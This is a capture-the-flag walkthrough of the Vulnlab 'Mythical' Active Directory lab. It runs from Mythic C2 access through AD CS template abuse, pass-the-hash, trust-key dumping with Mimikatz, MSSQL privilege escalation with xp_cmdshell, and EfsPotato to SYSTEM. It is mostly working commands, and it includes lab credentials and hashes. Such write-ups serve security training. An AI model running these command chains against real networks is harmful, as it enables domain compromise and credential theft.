VL-Mythical

,

Mythical CHAIN - Penetration Testing Walkthrough

Initial Reconnaissance

Starting with our first machine discovery:

1
2
3
4
5
6
7
8
9
10
11
PORT     STATE SERVICE       REASON          VERSION
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.mythical-us.vl
| Issuer: commonName=dc01.mythical-us.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-28T15:12:13
| Not valid after:  2025-05-30T15:12:13
| MD5:   ba60:dfbc:1933:a166:8d8b:c162:b60f:7716
| SHA-1: 666e:a128:ab04:d46a:5610:1836:8eb8:e4f8:bf5d:76bf

Second machine port scan results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp   open  http     syn-ack ttl 63 Golang net/http server
7443/tcp open  ssl/http syn-ack ttl 62 nginx 1.25.5
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: 400 The plain HTTP request was sent to HTTPS port
|_Requested resource was /new/login
| ssl-cert: Subject: organizationName=Mythic
| Issuer: organizationName=Mythic
| Public Key type: ec
| Public Key bits: 384
| Signature Algorithm: ecdsa-with-SHA384
| Not valid before: 2024-11-24T15:26:17
| Not valid after:  2025-11-24T15:26:17
| MD5:   bc51:3614:2940:10c1:3fc7:fb2b:f260:7b09
| SHA-1: a844:a1a0:9f51:4d03:6d59:00cd:3fe4:2811:d1ec:d967
|_-----END CERTIFICATE-----

Third machine details:

1
2
3
4
5
6
7
8
9
10
11
12
PORT     STATE SERVICE       REASON          VERSION
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MYTHICAL-EU
|   NetBIOS_Domain_Name: MYTHICAL-EU
|   NetBIOS_Computer_Name: DC02
|   DNS_Domain_Name: mythical-eu.vl
|   DNS_Computer_Name: dc02.mythical-eu.vl
|   DNS_Tree_Name: mythical-eu.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-19T19:16:53+00:00
|_ssl-date: 2025-04-19T19:17:00+00:00; -1h59m43s from scanner time.

Initial Access - Mythic C2

Accessing the Mythic C2 interface at: https://<Machine 2 IP>:7443/new/login
Mythic C2 Login Interface
From the assumed breach, we received these credentials:

1
mythic_admin : wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX

Command Execution and Enumeration

After logging in, we begin sending commands to our agent:
Sending Commands via Mythic
First, we change directory to the user’s home folder:

1
sleep 0 0
1
register_assembly SharpHound.exe
1
execute_assembly SharpHound.exe -c All

Then wait for SharpHound to finish and download the results:

1
download 20250419124353_BloodHound.zip

We send our data to BloodHound Community Edition (BHCE) for analysis. For reference on installing BHCE with Docker, see: https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf
From BloodHound analysis, we discover that user Momo has RDP access:
Momo Can RDP

Network Share Enumeration

Let’s find what shares we have access to. First, we need to navigate to:

1
C:\_admin\cwrsync\bin

RSync Executable Location
List available shares:

1
shell rsync.exe --list-only rsync://192.168.25.1

Available Shares
Now we’ll create a folder and copy the contents of the mythical share:

1
shell mkdir \hello
1
shell rsync -av rsync://192.168.25.1/mythical /

We discover a flag:
Flag Found

Credential Recovery

To download the it.kdbx file, we click the actions button and then download. The agent sends a task and the response enables downloading the file.
KeePass version 4 requires special handling as keepass2john doesn’t support it. We’ll use a GitHub repository with a bash script for brute-forcing:

1
https://github.com/r3nt0n/keepass4brute

From the wiki, we know the password should be in one of the smaller rockyou lists:

1
./keepass4brute.sh ../it.kdbx /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt

Password Found
Inside the KeePass database, we find credentials for a user named domjoin:
KeePass Contents

Certificate Template Exploitation

Let’s check for vulnerable certificate templates. We’ll use Certify, which needs to be compiled for Windows (Visual Studio 2019 with .NET 4):

1
register_assembly Certify.exe
1
execute_assembly Certify.exe find /vulnerable

Output reveals a vulnerable template:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[!] Vulnerable Certificates Templates :

    CA Name                               : dc01.mythical-us.vl\mythical-us-DC01-CA
    Template Name                         : Machine
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions

We’ve identified an ESC4 vulnerability. To exploit it, we’ll impersonate the domjoin user:

1
make_token mythical-us\domjoin <PASS>

Next, we’ll upload StandIn to create a computer account and join the domain:

1
register_assembly StandIn_v13_Net45.exe
1
execute_assembly StandIn_v13_Net45.exe --computer panosoiko --make

Machine Account Created
Impersonate the machine account we created:

1
make_token mythical-us\panosoiko$ zgbyv9HgwnfF2QV

With our machine account context, we’ll convert the ESC4 vulnerability to ESC1:

1
execute_assembly StandIn_v13_Net45.exe --ADCS --filter Machine --ess --add

Successfully added the msPKI-Certificate-Name-Flag to the certificate. Now add Certificate Enrollment Permissions to the Domain Users group:

1
2
execute_assembly StandIn_v13_Net45.exe --ADCS --filter Machine --ntaccount
"mythical-us\domain users" --enroll --add

Now exploit the ESC1 vulnerability using Certify:

1
execute_assembly Certify.exe request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:administrator@mythical-us.vl

Domain Users Added

Certificate to NTLM Hash

Load Rubeus for ticket manipulation:

1
register_assembly Rubeus.exe

Save the Certify output to a cert.pem file and convert it:

1
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Upload the certificate:

1
upload -File (path)cert.pfx

Use Rubeus to extract the Administrator’s NTLM hash:

1
execute_assembly Rubeus.exe asktgt /user:Administrator /certificate:c:\users\momo.ayase\admin.pfx /ptt /nowrap /getcredentials|

Administrator Hash Retrieved
Obtained hash: C583EF48C5ED66NOPENOPENOPE
Since Mimikatz didn’t work, we’ll use Invoke-SMBExec.ps1 to trigger the agent with admin privileges:

1
powershell Invoke-SMBExec -Target 127.0.0.1 -Domain mythical-us.vl -Username administrator -Hash <HASH> -Command "c:\programdata\google\update.exe"

System Shell Obtained

Domain Trust Exploitation

After uploading Mimikatz again, we’ll dump the domain trust information to explore the relationship with DC02:

1
shell C:/Users/Administrator/mimikatz.exe "lsadump::trust /patch"

Output reveals trust details:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Domain: MYTHICAL-EU.VL (MYTHICAL-EU / S-1-5-21-1148612195-3581135157-3534241443)
 [  In ] MYTHICAL-US.VL -> MYTHICAL-EU.VL

 [ Out ] MYTHICAL-EU.VL -> MYTHICAL-US.VL
    * 4/20/2025 7:02:21 AM - CLEAR   - e6 39 a6 04 66 75 38 7d 33 a6 13 ce 4f 66 cf f9 fc 9f c4 79 6d f7 cc 0a 0e 51 5a 34 59 5a e9 79 4f ad 90 d6 c1 95 47 66 00 fe 65 02 4c b4 b3 8e 8f b1 31 07 af 43 5e 39 be 1a aa ac ed 06 70 3a 86 5c 48 76 3d f5 f5 a8 f2 57 08 fd 42 0a 6d 32 3b f6 5e 5f ac 62 94 4b 91 e7 d8 3c 3e ea c8 b4 07 f8 f7 ce 35 8a 99 8c 60 23 b4 df 63 fc a5 5a a7 57 26 da 76 eb 22 ec f7 4b e2 55 21 7c 6a 43 65 3f fd 1b 43 49 53 9f 5e 14 e4 c6 13 42 af 93 a1 4d 24 07 f8 91 28 10 d6 b7 70 59 ac fb c2 f7 22 aa d0 d7 f2 2c c2 24 cb 44 b0 3b 64 89 46 a8 9b 9c 78 ef 7f 5e e1 7d 11 5d 1f 98 4c 12 8b dd 89 5d c5 2b ce 8c eb ff bb 76 0e 2a 98 0c 0b 51 b8 c3 5e 74 2d 7a 87 4d 6b 67 4a 0c 45 4f b6 fe a9 05 2f 60 2b c9 bf 76 ba 78 7a 66 89 61 29 52 
	* aes256_hmac       a1757854f414bcd2aefc48cd445abae179806110cf763f255b5032f36ae4f1c3
	* aes128_hmac       f9b024c28fee48b95fd0fc27546affc9
	* rc4_hmac_nt       d96d7d0a04d48ee91ab49a97c012fefd

 [ In-1] MYTHICAL-US.VL -> MYTHICAL-EU.VL

 [Out-1] MYTHICAL-EU.VL -> MYTHICAL-US.VL
    * 4/20/2025 7:02:21 AM - CLEAR   - a1 39 02 5e 0a 3d ce c0 af c9 6a ab 1c ea 0a 0a 7e 3f 20 d2 ea f6 95 93 c2 9f f8 7e 
	* aes256_hmac       cecbd91e50ff3ee7fbd725fbe9e2f3ea4d4445e549100607c3f2239307391076
	* aes128_hmac       652888ee3ab5fac7ea1ebf84e423d59d
	* rc4_hmac_nt       eb921a2b0e9d626559dab0f54fdc6498

Additional trust information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Direction               : Outbound
DisallowTransivity      : False
DistinguishedName       : CN=mythical-eu.vl,CN=System,DC=mythical-us,DC=vl
ForestTransitive        : False
IntraForest             : False
IsTreeParent            : False
IsTreeRoot              : False
Name                    : mythical-eu.vl
ObjectClass             : trustedDomain
ObjectGUID              : 03ce402a-bf80-4b34-81dd-53cbe802337d
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source                  : DC=mythical-us,DC=vl
Target                  : mythical-eu.vl
TGTDelegation           : False
TrustAttributes         : 4
TrustedPolicy           : 
TrustingPolicy          : 
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False

We discover that users from mythical-eu.vl can authenticate to mythical-us.vl, but not vice versa - a one-way trust. Following GitHub guidance, we exploit trust accounts:

1
execute_assembly -Assembly Rubeus.exe -Arguments asktgt /user:mythical-us$ /domain:mythical-eu.vl /rc4:d96d7d0a04d48ee91ab49a97c012fefd /nowrap /ptt

Trust Account Access
Now we can enumerate users on mythical-eu.vl:

1
powershell get-aduser -Filter * -Server mythical-eu.vl -Properties *
1
get-aduser -Filter * -Server "dc02.mythical-eu.vl" -Property DisplayName, SamAccountName | Select-Object DisplayName, SamAccountName0

Results reveal service accounts that might be exploitable:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
DisplayName      SamAccountName  
-----------      --------------  
                 Administrator        
Wendy Adams      Wendy.Adams     
William Jennings William.Jennings
Julie Khan       Julie.Khan      
Alan Rhodes      Alan.Rhodes     
Jay Little       Jay.Little      
Owen Dunn        Owen.Dunn       
Howard Frost     Howard.Frost    
Naomi Campbell   Naomi.Campbell  
Judith Smith     Judith.Smith    
Nicholas Hill    Nicholas.Hill   
Karl Kaur        Karl.Kaur       
Hilary Pearson   Hilary.Pearson  
Marcus Elliott   Marcus.Elliott  
Fiona Knight     Fiona.Knight    
Jay Miller       Jay.Miller      
Josephine Smith  Josephine.Smith 
Mohammad Jones   Mohammad.Jones  
Glen Price       Glen.Price      
Amber Hussain    Amber.Hussain   
Megan Higgins    Megan.Higgins   
Donald Burton    Donald.Burton   
Jasmine Smith    Jasmine.Smith   
Kim Byrne        Kim.Byrne       
Jack Chambers    Jack.Chambers   
Danielle Andrews Danielle.Andrews
svc_ldap         svc_ldap        
svc_sql          svc_sql         
root             root

The svc_sql and svc_ldap accounts look promising. We search for SPNs but find none:

1
powershell Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -Server dc02.mythical-eu.vl | Select Name, ServicePrincipalName

DC02 Share Enumeration

Let’s search through DC02 shares:

1
shell net view \\dc02.mythical-eu.vl\

DC02 Shares
We spot a non-standard “dev” share. Let’s explore it:

1
ls \\dc02.mythical-eu.vl\dev

We find:

1
2
Autologon64.exe
getusers.exe

Using DNSpy to analyze these executables, we discover credentials:

1
svc_ldap : <PASS>

Cleartext Password for svc_ldap

Port Scanning and SQL Server Access

Using PortScanner to check for MSSQL ports on DC02:

1
execute_assembly -Assembly PortScanner.exe -Arguments hosts=10.10.161.167 ports=1433,1434 timeout=3000

We find port 1433 open, indicating MSSQL is running. Password spraying reveals svc_sql has the same password as svc_ldap:

1
make_token mythical-eu\svc_sql <PASS>

Upload sqlcmd and rename it to avoid issues:

1
cp -Source C:/Users/Administrator/sqlcmd.exe -Destination C:/Users/Administrator/sql.exe

SQL Command Tool Renamed
Successfully connecting to SQL Server:
SQL Server Access
Attempting to enable xp_cmdshell fails due to insufficient permissions:
No Command Shell Access

SQL Server Privilege Escalation

Checking our current privileges:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');"

We attempt to find users we can impersonate:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"

Cannot Impersonate Users
Listing database owners:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -d msdb -Q "SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)"

Database Ownership
We will escalate from svc_sql to dbo following SQL privilege escalation techniques:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT name, is_trustworthy_on FROM sys.databases WHERE name = 'msdb';"

Trustworthy Database
Create a malicious stored procedure in msdb:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -d msdb -Q "CREATE PROCEDURE sp_elevate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MYTHICAL-EU\svc_sql', 'sysadmin';"

Execute the stored procedure:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -d msdb -Q "EXEC sp_elevate_me;"

Verify sysadmin role:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "SELECT IS_SRVROLEMEMBER('sysadmin');"

Sysadmin Achieved
Enable xp_cmdshell:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';"

xp_cmdshell Enabled
We are running as nt service\mssql$sqlexpress.

Payload Deployment

Create a share for our agent:

1
mkdir -Path C:\hello
1
shell net share hello=C:\hello /grant:everyone,full
1
cp -Source C:/programdata/google/update.exe -Destination C:/hello/update.exe

Copy from the share to DC02:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "EXEC xp_cmdshell 'copy \\10.10.139.85\hello\update.exe C:\Windows\Temp\update.exe';"

Execute it:

1
shell C:/Users/Administrator/sql.exe -S tcp:10.10.139.87,1433 -Q "EXEC xp_cmdshell 'C:\Windows\Temp\update.exe';"

DC02 Access Gained

Privilege Escalation to SYSTEM

Since we’re running as a service, we have the SeImpersonatePrivilege enabled. We’ll use EfsPotato since SweetPotato doesn’t work:

1
register_assembly EfsPotato.exe
1
execute_assembly EfsPotato.exe \\10.10.139.85\hello\update.exe

System Access on DC02

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣤⣤⣤⣤⣄⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⠶⣻⠝⠋⠠⠔⠛⠁⡀⠀⠈⢉⡙⠓⠶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠞⢋⣴⡮⠓⠋⠀⠀⢄⠀⠀⠉⠢⣄⠀⠈⠁⠀⡀⠙⢶⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠞⢁⣔⠟⠁⠀⠀⠀⠀⠀⠈⡆⠀⠀⠀⠈⢦⡀⠀⠀⠘⢯⢢⠙⢦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡼⠃⠀⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠸⠀⠀⠀⠀⠀⢳⣦⡀⠀⠀⢯⠀⠈⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⠆⡄⢠⢧⠀⣸⠀⠀⠀⠀⠀⠀⠀⢰⠀⣄⠀⠀⠀⠀⢳⡈⢶⡦⣿⣷⣿⢉⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣯⣿⣁⡟⠈⠣⡇⠀⠀⢸⠀⠀⠀⠀⢸⡄⠘⡄⠀⠀⠀⠈⢿⢾⣿⣾⢾⠙⠻⣾⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⡿⣮⠇⢙⠷⢄⣸⡗⡆⠀⢘⠀⠀⠀⠀⢸⠧⠀⢣⠀⠀⠀⡀⡸⣿⣿⠘⡎⢆⠈⢳⣽⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢠⡟⢻⢷⣄⠀⠀⠀⠀⠀⠀⣾⣳⡿⡸⢀⣿⠀⠀⢸⠙⠁⠀⠼⠀⠀⠀⠀⢸⣇⠠⡼⡤⠴⢋⣽⣱⢿⣧⠀⢳⠈⢧⠀⢻⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⢀⡿⣠⡣⠃⣿⠃⠀⠀⠀⠀⣸⣳⣿⠇⣇⢸⣿⢸⣠⠼⠀⠀⠀⡇⠀⡀⠉⠒⣾⢾⣆⢟⣳⡶⠓⠶⠿⢼⣿⣇⠈⡇⠘⢆⠈⢿⡘⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠈⢷⣍⣤⡶⣿⡄⠀⠀⠀⢠⣿⠃⣿⠀⡏⢸⣿⣿⠀⢸⠀⠀⢠⡗⢀⠇⠀⢠⡟⠀⠻⣾⣿⠀⠀⠀⠀⡏⣿⣿⡀⢹⡀⠈⢦⠈⢷⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢁⣤⣄⠁⠀⠀⠀⣼⡏⢰⣟⠀⣇⠘⣿⣿⣾⣾⣆⢀⣾⠃⣼⢠⣶⣿⣭⣷⣶⣾⣿⣤⠀⠀⠀⡇⡯⣍⣧⠀⣷⠄⠈⢳⡀⢻⡁⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠺⣿⡿⠀⠀⠀⠀⡿⢀⣾⣧⠀⡗⡄⢿⣿⡙⣽⣿⣟⠛⠚⠛⠙⠉⢹⣿⣿⣦⠀⢸⡿⠀⠀⠀⢰⡯⣌⢻⡀⢸⢠⢰⡄⠹⡷⣿⣦⣤⠤⣶⡇⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀⣇⣾⣿⢸⢠⣧⢧⠘⣿⡇⠸⣿⢿⡆⠀⠀⠀⠀⠘⣯⠇⣿⠂⣸⢰⠀⠀⢀⣸⡧⣊⣼⡇⢸⣼⣸⣷⢣⢻⣄⠉⠙⠛⠉⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣳⣤⣴⣿⣏⣿⣾⢸⣿⡘⣧⣘⢿⣀⡙⣞⠁⠀⠀⠀⠀⢀⡬⢀⣉⢠⣧⡏⠀⠀⡎⣿⣿⣿⣿⠃⣸⡏⣿⣿⡎⢿⡘⡆⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⣠⣼⣿⣿⣿⣼⣿⣧⢿⣿⣿⣯⡻⠟⠀⠀⠀⠀⠀⠐⢯⠣⡽⢟⣽⠀⠀⢘⡇⣿⣿⣿⡟⣴⣿⣷⣿⣿⣧⣿⣷⡽⠀⠀⠀⠀⠀⠀⠀
⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣼⣹⣿⣇⣸⣿⣿⣿⣻⣚⣿⡿⣿⣿⣦⣤⣀⡉⠃⠀⢀⣀⣤⡶⠛⡏⠀⢀⣼⢸⣿⣿⣿⣿⣿⣿⣿⢋⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀
⣿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠒⠒⠒⢭⢻⣽⣿⣿⣿⣿⣿⣿⢿⠿⣿⡏⠀⡼⠁⣀⣾⣿⣿⣿⣿⡿⣿⣿⣟⡻⣿⣿⡿⠣⠟⠀⠀⠀⠀⠀⠀⠀⠀
⠸⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢧⢿⣯⡽⠿⠛⠋⣵⢟⣋⣿⣶⣞⣤⣾⣿⣿⡟⢉⡿⢋⠻⢯⡉⢻⡟⢿⡅⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢻⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⡞⣿⣆⡀⠀⡼⡏⠉⠚⠭⢉⣠⠬⠛⠛⢁⡴⣫⠖⠁⠀⠀⣩⠟⠁⣸⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠈⢷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣽⣿⣿⣾⠳⡙⣦⡤⠜⠊⠁⠀⣀⡴⠯⠾⠗⠒⠒⠛⠛⠛⠛⠛⠓⠿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠘⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠰⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢷⣻⣿⣿⠔⢪⠓⠬⢍⠉⣩⣽⢻⣤⣶⣦⠀⠀⠀⢀⣀⣤⣴⣾⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠹⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣾⡏⢦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣯⣿⣿⠀⠀⣇⠀⣠⠎⠁⢹⡎⡟⡏⣷⣶⠿⠛⡟⠛⠛⣫⠟⠉⢿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢻⡄⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣷⠈⢷⡤⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣾⣷⡀⣀⣀⣷⡅⠀⠀⠈⣷⢳⡇⣿⠀⠀⣸⠁⢠⡾⣟⣛⣻⣟⡿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢯⢻⣏⡵⠿⠿⢤⣄⠀⢀⣿⢸⣹⣿⣀⣴⣿⣴⣿⣛⠋⠉⠉⡉⠛⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠘⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⡎⣿⣥⣶⠖⢉⣿⡿⣿⣿⡿⣿⣟⠿⠿⣿⣿⣿⡯⠻⣿⣿⣿⣷⡽⣿⡗⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠸⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⡘⣿⣩⠶⣛⣋⡽⠿⣷⢬⣙⣻⣿⣿⣿⣯⣛⠳⣤⣬⡻⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀
⠀⣿⣛⣻⣿⡿⠿⠟⠗⠶⠶⠶⠶⠤⠤⢤⠤⡤⢤⣤⣤⣤⣤⣄⣀⣀⣀⣀⣀⣀⣀⣀⣣⢹⣷⣶⣿⣿⣦⣴⣟⣛⣯⣤⣿⣿⣿⣿⣿⣷⣌⣿⣿⣿⣿⣿⣿⣿⣤⣤⣤⣤⣤⣤⣄
⠀⠉⠙⠛⠛⠛⠛⠛⠻⠿⠿⠿⠷⠶⠶⢶⣶⣶⣶⣶⣤⣤⣤⣤⣤⣥⣬⣭⣭⣉⣩⣍⣙⣏⣉⣏⣽⣶⣶⣶⣤⣤⣬⣤⣤⣾⣿⠶⠾⠿⠿⠿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠃
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⠉⠉⠉⠉⠛⠛⠛⠛⠛⠛⠋⠉⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

The flag is in memory (user “root”).

1
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

Search around you will find the flag :0
https://api.vulnlab.com/api/v1/share?id=a325bfee-e9a7-49f2-9646-494f10841eef